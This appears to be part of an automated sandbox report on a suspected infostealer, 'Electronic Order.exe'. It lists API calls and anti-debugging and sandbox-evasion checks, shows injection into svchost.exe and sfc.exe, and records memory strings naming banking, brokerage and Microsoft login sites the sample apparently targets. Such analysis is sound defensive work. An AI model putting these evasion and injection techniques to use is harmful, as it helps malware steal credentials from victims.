            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00DC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00DC4A35
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_00E455FD
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00DE33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00DE33C7
            Source: C:\Users\user\Desktop\Electronic Order.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Electronic Order.exe | API/Special instruction interceptor: Address: 1583254
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0357096E rdtsc | 2_2_0357096E
            Source: C:\Windows\SysWOW64\sfc.exe | Window / User API: threadDelayed 9834
            Source: C:\Users\user\Desktop\Electronic Order.exe | API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\sfc.exe | API coverage: 2.5 %
            Source: C:\Windows\SysWOW64\sfc.exe TID: 4440 | Thread sleep count: 137 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 4440 | Thread sleep time: -274000s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe TID: 4440 | Thread sleep count: 9834 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 4440 | Thread sleep time: -19668000s >= -30000s
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe TID: 6428 | Thread sleep time: -50000s >= -30000s
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe TID: 6428 | Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E24696 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_00E24696
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_00E2C9C7
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E2C93C FindFirstFileW,FindClose, | 0_2_00E2C93C
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00E2F200
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00E2F35D
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_00E2F65E
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_00E23A2B
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_00E23D4E
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_00E2BF27
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_0074C1A0 FindFirstFileW,FindNextFileW,FindClose, | 7_2_0074C1A0
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00DC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_00DC4AFE
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rs - EU East & CentralVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 30-335c-.7.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 30-335c-.7.dr | Binary or memory string: discord.comVMware20,11696487552f
            Source: 30-335c-.7.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware2
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rs.co.inVMware20,11696487552~
            Source: 30-335c-.7.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 30-335c-.7.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: global block list test formVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,11696487552u
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: kers - non-EU EuropeVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: AMC password management pageVMware20,11696487552
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CE6000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958550650.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2808962227.000001354145C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 30-335c-.7.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 30-335c-.7.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .bankofamerica.comVMware20,11696487552|UE
            Source: 30-335c-.7.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 30-335c-.7.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 30-335c-.7.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 30-335c-.7.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 30-335c-.7.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 30-335c-.7.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,
            Source: 30-335c-.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 30-335c-.7.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 30-335c-.7.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autofill_travelsVMware2
            Source: 30-335c-.7.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: 30-335c-.7.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 30-335c-.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 30-335c-.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: active Brokers - COM.HKVMware20,11696487552
            Source: 30-335c-.7.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: sfc.exe, 00000007.00000002.3962019636.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552
            Source: C:\Users\user\Desktop\Electronic Order.exe | API call chain: ExitProcess graph end node | graph_0-98283
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\sfc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0357096E rdtsc | 2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417913 LdrLoadDll, | 2_2_00417913
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E341FD BlockInput, | 0_2_00E341FD
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00DC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00DC3B4C
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00DF5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 0_2_00DF5CCC
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E3C304 LoadLibraryA,GetProcAddress, | 0_2_00E3C304
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_01583520 mov eax, dword ptr fs:[00000030h] | 0_2_01583520
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_015834C0 mov eax, dword ptr fs:[00000030h] | 0_2_015834C0
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_01581E70 mov eax, dword ptr fs:[00000030h] | 0_2_01581E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] | 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] | 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] | 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h] | 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] | 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] | 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h] | 2_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h] | 2_2_035D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] | 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D437C mov eax, dword ptr fs:[00000030h] | 2_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360634F mov eax, dword ptr fs:[00000030h] | 2_2_0360634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h] | 2_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h] | 2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03608324 mov ecx, dword ptr fs:[00000030h] | 2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h] | 2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h] | 2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h] | 2_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h] | 2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h] | 2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h] | 2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h] | 2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h] | 2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h] | 2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h] | 2_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] | 2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] | 2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] | 2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] | 2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]2_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]2_2_035663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]2_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]2_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]2_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]2_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]2_2_0352826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360625D mov eax, dword ptr fs:[00000030h]2_2_0360625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]2_2_0352823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036062D6 mov eax, dword ptr fs:[00000030h]2_2_036062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]2_2_0352C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]2_2_035C8158
